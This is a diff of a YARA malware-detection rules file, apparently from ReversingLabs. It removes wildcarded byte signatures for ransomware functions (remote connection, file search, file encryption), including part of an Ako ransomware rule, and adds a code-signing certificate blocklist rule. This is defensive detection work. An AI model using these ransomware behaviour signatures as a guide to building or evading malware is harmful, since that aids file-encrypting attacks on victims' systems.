-	strings:
-		$remote_connection_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? A1 ?? ?? ??
-            ?? 33 DB 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ??
-            03 C1 89 9D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 51
-            50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 89 5D ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ??
-            ?? ?? ?? 53 0F 43 85 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ??
-            85 DB 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F 43 0D
-            ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 51 50 51
-            8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 50 53
-            FF 15 ?? ?? ?? ?? 8B 55 ?? 8B D8 89 9D ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55
-            ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
-            76 ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 66 89 45 ?? 85 DB 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9
-        }
-		$remote_connection_p2 = {
-            0F 43 0D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D BD ??
-            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F 43 BD ?? ?? ?? ?? 83
-            3D ?? ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F
-            43 0D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 57 53 FF 15 ?? ?? ??
-            ?? 8B 55 ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ??
-            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B 95 ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ??
-            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ??
-            FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 45 ?? 0F 43 4D ?? 03 C1 83 7D ?? ?? 8D 4D
-            ?? 0F 43 4D ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 8D 4D ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ??
-            ?? ?? 83 3D ?? ?? ?? ?? ?? 8B 75 ?? 8B C6 0F 43 0D ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B
-        }
-		$remote_connection_p3 = {
-            55 ?? 2B C2 57 51 3B F8 77 ?? 8D 04 3A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34
-            10 56 E8 ?? ?? ?? ?? 83 C4 ?? C6 04 37 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5
-            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 75 ?? 8B C6
-            8B BD ?? ?? ?? ?? 0F 43 CF 8B 55 ?? 2B C2 8B 9D ?? ?? ?? ?? 53 51 3B D8 77 ?? 8D 04
-            1A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34 10 56 E8 ?? ?? ?? ?? 83 C4 ?? C6 04
-            1E ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B BD
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ?? ?? ?? 83 3D ?? ??
-            ?? ?? ?? 8B 75 ?? 8B C6 0F 43 0D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 55 ?? 2B C2 53 51
-            3B D8 77 ?? 8D 04 1A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34 10 56 E8 ?? ?? ??
-            ?? 83 C4 ?? C6 04 33 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 53 E8
-            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 45 ?? 0F 43
-            D3 8B 75 ?? 2B C6 8B 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45 ??
-            8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 06 ??
-            EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 9D ?? ??
-            ?? ?? 83 3D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B
-        }
-		$remote_connection_p4 = {
-            45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45
-            ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30
-            ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B D0 83 78 ?? ?? 72 ?? 8B 10
-            8B 48 ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D
-            04 0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4
-            ?? C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ??
-            ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ??
-            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? 83 3D
-            ?? ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D
-            ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03
-            F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ??
-            ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 55 ?? 8B 4D ?? 0F 43
-            55 ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04
-            0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ??
-            C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ??
-            83 3D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 45 ??
-            8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 31 89 45 ?? 8D
-        }
-		$remote_connection_p5 = {
-            45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30 ?? EB
-            ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ??
-            ?? 85 F6 74 ?? 8B 45 ?? 8D 4D ?? 83 7D ?? ?? 6A ?? 0F 43 4D ?? 50 50 51 6A ?? FF B5
-            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ??
-            ?? ?? ?? 51 68 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 F6 8B 35 ??
-            ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 FF D6 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B
-            85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C6 45 ?? ?? 83 F8 ?? 72 ?? 8D 48 ?? 8B C3 81 F9 ?? ?? ?? ?? 72 ?? 8B 5B ?? 83 C1 ??
-            2B C3 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ??
-            ?? ?? 83 F8 ?? 72 ?? 8D 48 ?? 8B C7 81 F9 ?? ?? ?? ?? 72 ?? 8B 7F ?? 83 C1 ?? 2B C7
-        }
-		$remote_connection_p6 = {
-            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ??
-            72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
-            F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55
-            ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
-            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ??
-            42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ??
-            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD
-            E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 55 ?? 8B 4D ?? 0F 43 55 ?? 03 CA 89 85 ?? ?? ?? ??
-            83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83
-            7F ?? ?? 72 ?? 8B 3F 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ??
-            ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76
-            ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 83 7D ?? ?? 8D 4D ?? 66 89 85 ?? ?? ?? ?? 0F 43 4D ?? 8B 45 ?? 03 C1 C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B F0 83 7E ?? ?? 72 ?? 8B 36 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ??
-            ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
-            C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 50 6A ?? 68 ?? ?? ?? ?? 57 8B 3D ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? FF D7 89 85 ?? ?? ?? ?? 83
-            F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF
-            D7 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C9 BA
-        }
-		$encrypt_files_p2 = {
-            8D 40 ?? F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? BA ?? ??
-            ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 03 CA 89 85 ?? ?? ?? ?? 83 3D ?? ?? ??
-            ?? ?? B8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 43 05 ?? ?? ?? ?? 51 50 8B CE E8 ?? ?? ??
-            ?? A1 ?? ?? ?? ?? 83 C4 ?? 33 C9 68 ?? ?? ?? ?? 6A ?? 56 66 89 0C 46 8D 85 ?? ?? ??
-            ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42
-            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
-            ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
-            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 42
-            8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
-            0F 86 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ??
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ??
-            8D 45 ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 FF 33 F6 57 FF B5 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 57 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84
-        }
-		$encrypt_files_p3 = {
-            8B 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 F8 8D 85 ?? ?? ?? ?? 3B
-            BD ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 0F 44 F1 50 6A ?? 56 6A ?? FF B5 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
-            ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            B9 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ??
-            ?? 8B 35 ?? ?? ?? ?? FF D6 FF B5 ?? ?? ?? ?? FF D6 C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ??
-            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A 85 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59
-            5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F9 89 BD ?? ?? ?? ?? 33 C0 89
-            85 ?? ?? ?? ?? 38 47 ?? 0F 85 ?? ?? ?? ?? 8B 07 8B 08 8D 85 ?? ?? ?? ?? 50 8D 49 ??
-            E8 ?? ?? ?? ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 83 7F ?? ?? 74 ?? 8B 07 8B 08 8D 85 ?? ??
-            ?? ?? 50 8D 49 ?? E8 ?? ?? ?? ?? 83 38 ?? 0F 84 ?? ?? ?? ?? 8B 07 8D 8D ?? ?? ?? ??
-            8B 30 8D 46 ?? 50 E8 ?? ?? ?? ?? 8D 46 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ??
-            ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76
-            ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 07 8B
-            30 8B 46 ?? 8B 00 85 C0 74 ?? 8D 8D ?? ?? ?? ?? 51 50 8D 85 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 83 C4 ?? 66 83 38 ?? 75 ?? 8B 46 ?? FF 30 FF 15 ?? ?? ?? ?? 8B 46 ?? 83 C4
-            ?? C7 00 ?? ?? ?? ?? EB ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D
-            4E ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C6 45 ?? ?? 81 7F ?? ?? ?? ?? ?? 8B 37 8B 36 75 ?? 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 8B 46 ?? 89 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 8D 85 ?? ?? ?? ?? 8D 4F ?? 50 E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Itgms Ltd" and pe.signatures [ i ] . serial == "64:2a:d8:e5:ef:8b:3a:c7:67:f0:d5:c1:a9:99:bd:aa" and 1447804800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Ako : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5333D3079D8Afda715703775E1389991 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ako ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fce98a6a-f7bd-52ee-a2b8-31b48f6134ca"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "4db299c6-5be9-5900-a944-07a0a41920a4"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.Ako.yara#L1-L173"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8321a4ace66ae48e3a6896daf02c184fa7767fa6bd10cd83b322ad01698008cf"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13186-L13202"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "98bd9d35c4e196a11943826115ab495833f7ef1d95f9736cc24255d6dd4fd21c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ako"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_win64_p1 = {
-            44 89 4C 24 ?? 4C 89 44 24 ?? 48 89 54 24 ?? 48 89 4C 24 ?? 56 57 48 81 EC ?? ?? ??
-            ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ??
-            48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 83 BC 24 ?? ?? ?? ?? ?? 75 ?? 32 C0 E9 ?? ?? ??
-            ?? 41 B9 ?? ?? ?? ?? 45 33 C0 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 89 44 24 ?? 81 7C 24 ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ?? ?? ?? ?? C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA
-            48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? 32
-            C0 E9 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24
-            ?? 45 33 C0 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 45 33 C0 BA ?? ?? ?? ??
-            48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84
-            24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            48 8D 84 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA 48 C7 44 24 ?? ?? ?? ??
-            ?? EB ?? 48 8B 44 24 ?? 48 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48
-            39 44 24 ?? 0F 8D ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ??
